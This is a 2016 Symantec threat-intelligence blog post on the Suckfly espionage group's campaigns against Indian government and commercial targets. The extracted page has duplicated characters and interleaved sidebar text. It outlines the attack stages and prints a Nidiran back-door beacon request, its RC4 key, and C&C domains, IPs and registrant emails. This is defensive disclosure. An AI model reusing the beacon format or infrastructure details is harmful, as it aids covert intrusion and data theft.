|Col1|CCOOMMMMUUNNIITTYY:: SSeeccuurriittyy BBllooggss SSeeccuurriittyy RReessppoonnssee|Col3|Col4|Col5|Col6| |---|---|---|---|---|---| |||LLooggiinn oorr RReeggiisstteerr ttoo ppaarrttiicciippaattee|한한국국어어|HHeellpp|SSttoorree| **Blogs > Security ResponseBlogs > Security Response** ##### Suckfly conducted long-term espionage campaigns against government and� commercial organizations in India. **Created: 17 May 2016 12:59:14 GMT • Updated: 17 May 2016 15:02:44 GMT • Translations available: 简体[中⽂], ⽇本[語]** **Jon_DiMaggio** **SYMANTEC EMPLOYEE** **+3+3** **3 Votes** **COMMUNITY:COMMUNITY: SecuritySecurity** **BlogsBlogs** **Security ResponseSecurity Response** **LoginLogin or or RegisterRegister** # Security Response ### Indian organizations targeted in Suckfly attacks�Indian organizations targeted in Suckfly attacks� ##### Suckfly conducted long-term espionage campaigns against government and� **分享** **0** **[ShareShare](javascript:void(0);)** **1** **[Tweet](https://twitter.com/share)** **Blog Feature Image:** **[worldpoints_bluearc.jpg](http://www.symantec.com/connect/sites/default/files/blog-post-feature-images/worldpoints_bluearc_0.jpg)** **In March 2016, Symantec published a blog on** **[Suckfly, an advanced cyberespionage group� that conducted attacks](http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates)** **against a number of South Korean organizations to steal digital certificates. Since then we have identified a number�** **of attacks over a two-year period, beginning in April 2014, which we attribute to Suckfly. The attacks targeted high-�** **profile targets, including government and commercial organizations. These attacks occurred in several different�** **countries, but our investigation revealed that the primary targets were individuals and organizations primarily** **located in India.** **While there have been several Suckfly campaigns that infected organizations with the group’s custom malware�** **[Backdoor.Nidiran, the Indian targets show a greater amount of post-infection activity than targets in other regions.](https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99)** **This suggests that these attacks were part of a planned operation against specific targets in India.�** **Campaign activity in India** **The first known Suckfly campaign began in April of 2014. During our investigation of the campaign, we identified a�** **number of global targets across several industries who were attacked in 2015. Many of the targets we identified�** **were well known commercial organizations located in India. These organizations included:** **One of India's largest financial organizations�** **A large e-commerce company** **The e-commerce company's primary shipping vendor** **One of India's top five IT firms�** **A United States healthcare provider's Indian business unit** **Two government organizations** **Suckfly spent more time attacking the government networks compared to all but one of the commercial targets.�** **Additionally, one of the two government organizations had the highest infection rate of the Indian targets. Figure 1** **shows the infection rate for each of the targets.** **分享** **1** **0** **Thousands of Ubiquiti AirOS routers hit with** **worm attacks** **Symantec Securi... - May 19, 2016** **Indian organizations targeted in Suckfly�** **attacks** **Jon_DiMaggio - May 17, 2016** **Internet Explorer zero day exploit used in** **Pittsburgh Security User Group Meeting** **- May 25, 2016** **25 May, 2016 - 14:00 EDT** **Michigan Security User Group meeting -** **June 7, 2016** **07 Jun, 2016 - 10:00 EDT** **Symantec Data Loss Prevention 14.0** **Administration - Authorized Training** **13 Jun, 2016 - 10:00 EDT** **Las Vegas DLP User Group Meeting -** **June 16** **16 Jun, 2016 - 11:00 PDT** **Symantec Endpoint Protection 12.X:** **Administration** **20 Jun, 2016 - 10:00 EDT** **South Florida Security User Group** **Meeting -- June 22** **22 Jun, 2016 - 11:30 EDT** **Cleveland Security User Group Meeting -** **June 23** **23 Jun, 2016 - 9:00 EDT** **Control Compliance Suite - Authorized** **Training** **27 Jun, 2016 - 10:00 EDT** **SAVE THE DATE - Atlanta User Group** **Meeting** **10 Aug, 2016 - 11:00 EDT** **SAVE THE DATE - Twin Cities DLP User** **Group Meeting** **14 Sep, 2016 - 11:00 CDT** **[ShareShare](javascript:void(0);)** #### LinksLinks **Technical SupportTechnical Support** **Symantec TrainingSymantec Training** **Symantec.comSymantec.com** **Purchase Endpoint Protection SmallPurchase Endpoint Protection Small** **Business EditionBusiness Edition** **[Purchase SSL Certificates�Purchase SSL Certificates�](http://www.symantec.com/connect/store/ssl-certificates?inid=connect_store_versign_links_versign)** **[Website Security Solutions KnowledgeWebsite Security Solutions Knowledge](https://knowledge.verisign.com/support/ssl-certificates-support/index.html)** **BaseBase** #### Featured PostsFeatured Posts ----- **What you need to know about election apps** **and your personal data** **Cynthia Chen - April 25, 2016** **Microsoft Patch Tuesday – April 2016** **himanshu_mehta - April 12, 2016** **New Adobe Flash Player exploit used by** **Magnitude and Nuclear exploit kits** **Karthikeyan Kas... - April 12, 2016** **Samsam may signal a new trend of targeted** **ransomware** **Symantec Securi... - April 05, 2016** **Most prevalent Android ransomware in the** **West arrives in Japan** **Joji Hamada - March 31, 2016** **Taiwan targeted with new cyberespionage** **back door Trojan** **Jon_DiMaggio - March 29, 2016** #### Recent Blog PostsRecent Blog Posts **_Figure 1. Infection rates of Indian targets_** **Indian government org #2 is responsible for implementing network software for different ministries and departments** **within India's central government. The high infection rate for this target is likely because of its access to technology** **and information related to other Indian government organizations.** **Suckfly's attacks on government organizations that provide information technology services to other government�** **branches is not limited to India. It has conducted attacks on similar organizations in Saudi Arabia, likely because of** **the access that those organizations have.** **Suckfly's targets are displayed in figure 2 by their industry, which provides a clearer view of the group’s operations.�** **Most of the group's attacks are focused on government or technology related companies and organizations.** **_Figure 2. Suckfly victims, by industry�_** **Suckfly attack lifecycle�** **One of the attacks we investigated provided detailed insight into how Suckfly conducts its operations. In 2015,�** **Suckfly conducted a multistage attack between April 22 and May 4 against an e-commerce organization based in�** **India. Similar to its other attacks, Suckfly used the Nidiran back door along with a number of hacktools to infect the�** **[victim's internal hosts. The tools and malware used in this breach were also signed with stolen digital certificates�.](http://www.symantec.com/connect/blogs/keeping-your-code-signing-certificate-straight-and-narrow)** **During this time the following events took place:** ## Endpoint Protection (AntiVirus) Spam Online #### Fraud phishing Malicious Code Vulnerabilities & Exploits Messaging Gateway Messaging Filter for Service Providers Symantec Protection Suites (SPS) Mail Security for Exchange/Domino Email Security.cloud Encryption Desktop Email Encryption Symantec Endpoint Encryption Device Control S it Ri k **한국을** **겨냥한** **인터넷** **익스플로러(IE) 제로데이** **익스플** **로잇** **표적** **공격 • Symantec Security Response •** **12 May 2016 09:24:23 GMT** **기승을** **부리는 Locky 랜섬웨어 • Symantec Security** **Response • 23 Mar 2016 01:36:32 GMT** **시만텍, 새로운** **방식으로** **보안** **위협** **인텔리전스를** **제공** **하는** **최신** **인텔리전스** **페이지** **오픈 • Ben Nahorney •** **09 Mar 2016 04:48:17 GMT** **2015년, 시만텍** **침입** **차단** **시스템으로** **거둔** **성과 •** **Ankit Singh • 26 Jan 2016 01:53:55 GMT** **우크라이나** **정전** **사태와** **관련된** **파괴적인 Disakil 악성** **코드, 미디어** **기업에** **대한** **공격에도** **쓰여 • Symantec** **Security Response • 20 Jan 2016 09:59:49** **GMT** #### Filter by:Filter by: **Author** **Korean** #### Recently on TwitterRecently on Twitter **More than 1 million LinkedIn accounts had** **"123456" as their password.** **https://t.co/lex8o841gk (@jleyden)** **24 May 2016** **More than 2,500 Twitter accounts hacked to** **post links to adult dating and sex personals** **https://t.co/kVgdlsEjVz** **https://t.co/GqLWgvOAeS** **23 May 2016** **Gang in Japan steals approx $12.7m in ATM** **attack involving cloned credit cards stolen** **from bank in South Africa** **https://t.co/T0SScgpzRY** **23 May 2016** **Recently discovered Flash #vulnerability CVE-** **2016-4117 is now being used in Magnitude** **Exploit Kit. https://t.co/6IpUzfB2DR** **23 May 2016** **Would you give up your password for some** **chocolate? https://t.co/kj0AY7N3W8** **22 May 2016** #### Blog TagsBlog Tags ----- ##### day facebook Trojan.Zbot ##### day facebook **_Figure 3. Suckfly attack lifecycle�_** **1. Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-�** **commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on�** **the targeted user, but we did find a large open-source presence on the initial target. The target's job function,�** **corporate email address, information on work related projects, and publicly accessible personal blog could all** **be freely found online.** **2. On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows)�** **that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide** **access for their attack. While we know the attackers used a custom dropper to install the back door, we do** **not know the delivery vector. Based on the amount of open-source information available on the target, it is** **feasible that a spear-phishing email may have been used.** **3. After the attackers successfully exploited the employee’s system, they gained access to the e-commerce** **company's internal network. We found evidence that Suckfly used hacktools to move latterly and escalate�** **privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account** **credentials. With the account credentials, the attackers were able to access the victim's account and** **navigate the internal corporate network as though they were the employee.** **4. On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40** **open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers** **when they are not secured. It isn't clear why the attackers scanned for hosts with port 40 open because** **there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it’s clear�** **that the group was looking to expand its foothold on the e-commerce company's internal network.** **5. The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While�** **we know that the attackers used the Nidiran back door to steal information about the compromised** **organization, we do not know if Suckfly was successful in stealing other information.�** **These steps were taken over a 13-day period, but only on specific days. While tracking what days of the week�** **Suckfly used its hacktools, we discovered that the group was only active Monday through Friday. There was no�** **activity from the group on weekends. We were able to determine this because the attackers’ hacktools are** **command line driven and can provide insight into when the operators are behind keyboards actively working.** **Figure 4 shows the attackers’ activity levels throughout the week.** ----- **_Figure 4. Signed hacktools in use against targets, by day_** **This activity supports our theory, mentioned in the** **[previous Suckfly blog�, that this is a professional organized group](http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates)** **Suckfly's command and control infrastructure�** **Suckfly made its malware difficult to analyze to prevent their operations from being detected. However, we were�** **able to successfully analyze Suckfly malware samples and extract some of the communications between the�** **Nidiran back door and the Suckfly command and control (C&C) domains.�** **We analyzed the dropper, which is an executable that contains the following three files:�** **1. dllhost.exe: The main host for the .dll file�** **2. iviewers.dll: Used to load encrypted payloads and then decrypt them** **3. msfled: The encrypted payload�** **All three files are required for the malware to run correctly. Once the malware has been executed, it checks to see if�** **it has a connection to the internet before running. If the connection test is successful, the malware runs and** **attempts to communicate with the C&C domain over ports 443 and 8443. In the samples we analyzed we found the** **port and C&C information encrypted and hardcoded into the Nidiran malware itself. The Nidiran back door made** **the following initial communication request to the Suckfly C&C domain:�** **GET /gte_ok0/logon.php HTTP/1.1** **Accept: */*** **Accept-Encoding: gzip, deflate�** **User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR** **1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152;** **.NET CLR 3.5.30729)** **Host: REDACTED** **Connection: Keep-Alive** **Cookie:** **dfe6=OIAXUNXWn9CBmFBqtwEEPLzwRGmbMoNR7C0nLcHYa+C1tb4fp7ydcZSmVZ1c4akergWcQQ==** **The interesting information being transmitted to the C&C server in the initial request is located in the cookie which** **is comprised of the following:** **[COOKIE NAME]=[RC4 ENCRYPTED + B64 ENCODED DATA FROM VICTIM]** **The key for the RC4 encryption in this sample is the hardcoded string “h0le”. Once the cookie data is decoded,** **Suckfly has the network name, hostname, IP address, and the victim's operating system information.�** **Information about the C&C infrastructure identified in our analysis of Suckfly activity can be seen in Table 1.�** **Domain** **Registration** **IP address** **Registration date** **aux.robertstockdill[.]com** **kumar.pari@yandex[.]com** **Unknown** **April 1, 2014** **ssl.2upgrades[.]com** **kumar.pari@yandex[.]com** **176.58.96.234** **July 5, 2014** **bss.pvtcdn[.]com** **registrar@mail.zgsj[.]com** **106.184.1.38** **May 19, 2015** **ssl.microsoft-security-center[.]com** **Whoisguard** **Unknown** **July 20, 2015** **usv0503.iqservs-jp[.]com** **Domain@quicca[.]com** **133.242.134.121** **August 18, 2014** **fli.fedora-dns-update[.]com�** **Whoisguard** **Unknown** **Unknown** |Domain|Registration|IP address|Registration date| |---|---|---|---| |aux.robertstockdill[.]com|kumar.pari@yandex[.]com|Unknown|April 1, 2014| |ssl.2upgrades[.]com|kumar.pari@yandex[.]com|176.58.96.234|July 5, 2014| |bss.pvtcdn[.]com|registrar@mail.zgsj[.]com|106.184.1.38|May 19, 2015| |ssl.microsoft-security-center[.]com|Whoisguard|Unknown|July 20, 2015| |usv0503.iqservs-jp[.]com|Domain@quicca[.]com|133.242.134.121|August 18, 2014| ----- **Conclusion** **Suckfly targeted one of India’s largest e-commerce companies, a major Indian shipping company, one of India’s�** **largest financial organizations, and an IT firm that provides support for India’s largest stock exchange. All of these�** **targets are large corporations that play a major role in India’s economy. By targeting all of these organizations** **together, Suckfly could have had a much larger impact on India and its economy. While we don't know the�** **motivations behind the attacks, the targeted commercial organizations, along with the targeted government** **organizations, may point in this direction.** **Suckfly has the resources to develop malware, purchase infrastructure, and conduct targeted attacks for years�** **while staying off the radar of security organizations. During this time they were able to steal digital certificates from�** **South Korean companies and launch attacks against Indian and Saudi Arabian government organizations. There is** **no evidence that Suckfly gained any benefits from attacking the government organizations, but someone else may�** **have benefited from these attacks.�** **The nature of the Suckfly attacks suggests that it is unlikely that the threat group orchestrated these attacks on their** **own. We believe that Suckfly will continue to target organizations in India and similar organizations in other�** **countries in order to provide economic insight to the organization behind Suckfly's operations.�** **Protection** **Symantec has the following detections in place to protect against Suckfly’s malware:�** **Antivirus** **[Backdoor.Nidiran](https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99)** **[Backdoor.Nidiran!g1](http://www.symantec.com/security_response/writeup.jsp?docid=2015-120200-0342-99)** **[Hacktool](http://www.symantec.com/security_response/writeup.jsp?docid=2001-081707-2550-99)** **[Exp.CVE-2014-6332](https://www.symantec.com/security_response/writeup.jsp?docid=2014-111313-5510-99)** **Intrusion prevention system** **[Web Attack: Microsoft OleAut32 RCE CVE-2014-6332](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28032)** **[Web Attack: Microsoft OleAut32 RCE CVE-2014-6332 2](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27813)** **[Web Attack: Microsoft OleAut32 RCE CVE-2014-6332 4](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=70116)** **[Web Attack: OLEAUT32 CVE-2014-6332 3](http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28890)** **[System Infected: Trojan.Backdoor Activity 120](https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28977)** ###### Technical SupportTechnical Support **[Technical Support Home](http://www.symantec.com/business/support/index?page=home&locale=en_us)** **[Supported Products A to Z](http://www.symantec.com/business/support/index?page=products&locale=en_us)** **[Support Fundamentals](http://www.symantec.com/business/support/support_policies.jsp)** **[Customer Care](http://www.symantec.com/business/support/assistance_information.jsp)** **[Contact Technical Support](http://www.symantec.com/business/support/contact_techsupp_static.jsp)** ###### Symantec.comSymantec.com **[Small Business Overview](http://www.symantec.com/business/solutions/smallbusiness/)** **[Enterprise Overview](http://www.symantec.com/business/)** **[Solutions](http://www.symantec.com/business/solutions/)** **[Products](http://www.symantec.com/business/products/)** **[Training](http://www.symantec.com/business/training/)** **[Services](http://www.symantec.com/business/services/)** **[Security Response](http://www.symantec.com/business/security_response/)** **[Resources](http://www.symantec.com/business/resources/)** ###### StoreStore **Symantec Backup Exec for** **Windows Small Business Server** **Endpoint Protection Small** **Business Edition** **SSL Certificates�** ###### Community StatsCommunity Stats **Total PostsTotal Posts** **MembersMembers** ## 479,251479,251 **©2016 Symantec Corporation** **Contact Us** **[Privacy Policy](http://www.symantec.com/about/profile/policies/privacy.jsp)** **Terms and Conditions** **Mobile Site** -----